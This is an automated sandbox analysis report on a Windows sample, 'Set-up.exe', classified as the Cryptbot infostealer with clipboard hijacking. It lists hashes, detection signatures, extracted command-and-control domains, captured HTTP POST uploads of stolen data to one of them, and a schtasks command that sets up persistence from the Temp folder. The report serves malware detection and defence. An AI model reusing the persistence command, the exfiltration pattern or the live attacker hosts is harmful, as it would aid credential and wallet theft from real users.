Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name: Set-up.exe
Analysis ID: 1523427
MD5: bb85c40120dac356bfc311f4774d3439
SHA1: bdcc094a88aa8971753da0c86e05c68578e5ce84
SHA256: cff579e5facdd493e0b023979049f4504ffc611c352a7d97928943e61c66dd0d
Tags: ClipboardHijackerexeuser-aachum
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Found malware configuration
Source: Set-up.exe.7652.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["elevenvx11pn.top", "~elevenvx11pn.top", "analforeverlovyu.top", "zx11pn.top", "|Xl@elevenvx11pn.top"]}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_006615B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 5_2_006615B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9414B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 5_2_6C9414B0
Uses 32bit PE files
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Set-up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 5_2_006681E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C9BAC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C9BAD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C9BAD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 5_2_6C9E2EF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C95AF80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6CA1F960h 5_2_6C95E8C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C96E490
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C96E490
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C9604F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 5_2_6C9E04E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C960610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C96A790
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C96A790
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C96A720
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C960010
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6CA1D014h] 5_2_6CA14110
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C96C2C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C964203
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 5_2_6C9E8250
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C96A3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C96A3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C96A330
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C9BBDF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 5_2_6C999F90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C9BBF50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C97B987
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C97B98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C999910
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C9F9900
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C9BBAC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C9B7AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 5_2_6C96D424
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6CA1DFF4h 5_2_6C9B3440
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 5_2_6C96D5A4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 5_2_6C9B35F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 5_2_6C96D724
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C96D050
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 5_2_6C9D7100
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C9BB280
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C96D2B4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 5_2_6C9B93B0

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49706 -> 185.244.181.140:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49709 -> 185.244.181.140:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49708 -> 185.244.181.140:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: elevenvx11pn.top
Source: Malware configuration extractor URLs: ~elevenvx11pn.top
Source: Malware configuration extractor URLs: analforeverlovyu.top
Source: Malware configuration extractor URLs: zx11pn.top
Source: Malware configuration extractor URLs: |Xl@elevenvx11pn.top
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.244.181.140 185.244.181.140
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: BELCLOUDBG BELCLOUDBG
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary71095901User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 413Host: elevenvx11pn.top
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary18234966User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 90016Host: elevenvx11pn.top
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary50062139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 34443Host: elevenvx11pn.top
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: elevenvx11pn.top
Source: unknown HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary71095901User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 413Host: elevenvx11pn.top
Source: Set-up.exe, 00000000.00000003.1484449204.00000000007DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://elevenvx11pn.top/v1/upload.php
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: NrIpUDVFuuHZveDEtrIh.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: Set-up.exe String found in binary or memory: https://serviceupdate32.com/update
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C959B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber, 5_2_6C959B99
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C959B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber, 5_2_6C959B99

System Summary
barindex
Drops large PE files
Source: C:\Users\user\Desktop\Set-up.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_006651B0 5_2_006651B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_00663E20 5_2_00663E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C94CD00 5_2_6C94CD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6CA04E80 5_2_6CA04E80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C94EE50 5_2_6C94EE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C950FC0 5_2_6C950FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C990870 5_2_6C990870
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C982A7E 5_2_6C982A7E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C984490 5_2_6C984490
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9544F0 5_2_6C9544F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C980580 5_2_6C980580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C978570 5_2_6C978570
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C972110 5_2_6C972110
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C98FE10 5_2_6C98FE10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C981E40 5_2_6C981E40
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C955880 5_2_6C955880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C98D99E 5_2_6C98D99E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C99DA20 5_2_6C99DA20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C96F510 5_2_6C96F510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9796A0 5_2_6C9796A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9877D0 5_2_6C9877D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9570C0 5_2_6C9570C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C943000 5_2_6C943000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9811BE 5_2_6C9811BE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9912C0 5_2_6C9912C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C98F3C0 5_2_6C98F3C0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6CA13490 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6CA0AB60 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6CA15980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6CA15A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6CA138D0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6CA13310 appears 42 times
Uses 32bit PE files
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\YEWtNFaySe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\CuDNObfgqmczoBnKhtUp
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: Set-up.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Set-up.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Set-up.exe, 00000000.00000003.1526107515.000000000332D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknown Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe" Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: nripudvfuuhzvedetrih.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: nripudvfuuhzvedetrih.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: nripudvfuuhzvedetrih.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: Set-up.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Set-up.exe Static file information: File size 10006016 > 1048576
Source: Set-up.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c7600
Source: Set-up.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x671400
Source: Set-up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_00668230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 5_2_00668230
PE file contains sections with non-standard names
Source: Set-up.exe Static PE information: section name: .eh_fram
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: NrIpUDVFuuHZveDEtrIh.dll.0.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_0066A499 push es; iretd 5_2_0066A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C988C2A push edx; mov dword ptr [esp], ebx 5_2_6C988C3E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9B4DB0 push eax; mov dword ptr [esp], ebx 5_2_6C9B5018
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C994DC1 push eax; mov dword ptr [esp], ebx 5_2_6C994DD5
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C986E03 push edx; mov dword ptr [esp], ebx 5_2_6C986E17
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C994FA1 push eax; mov dword ptr [esp], ebx 5_2_6C994FB5
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C99285C push edx; mov dword ptr [esp], ebx 5_2_6C992870
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9A8850 push eax; mov dword ptr [esp], ebx 5_2_6C9A8E4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C990852 push eax; mov dword ptr [esp], ebx 5_2_6C990866
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9BE860 push eax; mov dword ptr [esp], ebx 5_2_6C9BE98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9C29A0 push eax; mov dword ptr [esp], ebx 5_2_6C9C2CD4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9C29A0 push edx; mov dword ptr [esp], ebx 5_2_6C9C2CF3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9F09E0 push eax; mov dword ptr [esp], edi 5_2_6C9F0B5A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9BEAC0 push eax; mov dword ptr [esp], ebx 5_2_6C9BEBE3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C994BE1 push eax; mov dword ptr [esp], ebx 5_2_6C994BF5
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9804BE push eax; mov dword ptr [esp], ebx 5_2_6C98048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9804AD push eax; mov dword ptr [esp], ebx 5_2_6C98048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9864A3 push edx; mov dword ptr [esp], ebx 5_2_6C9864B7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C998451 push 890005EAh; ret 5_2_6C998459
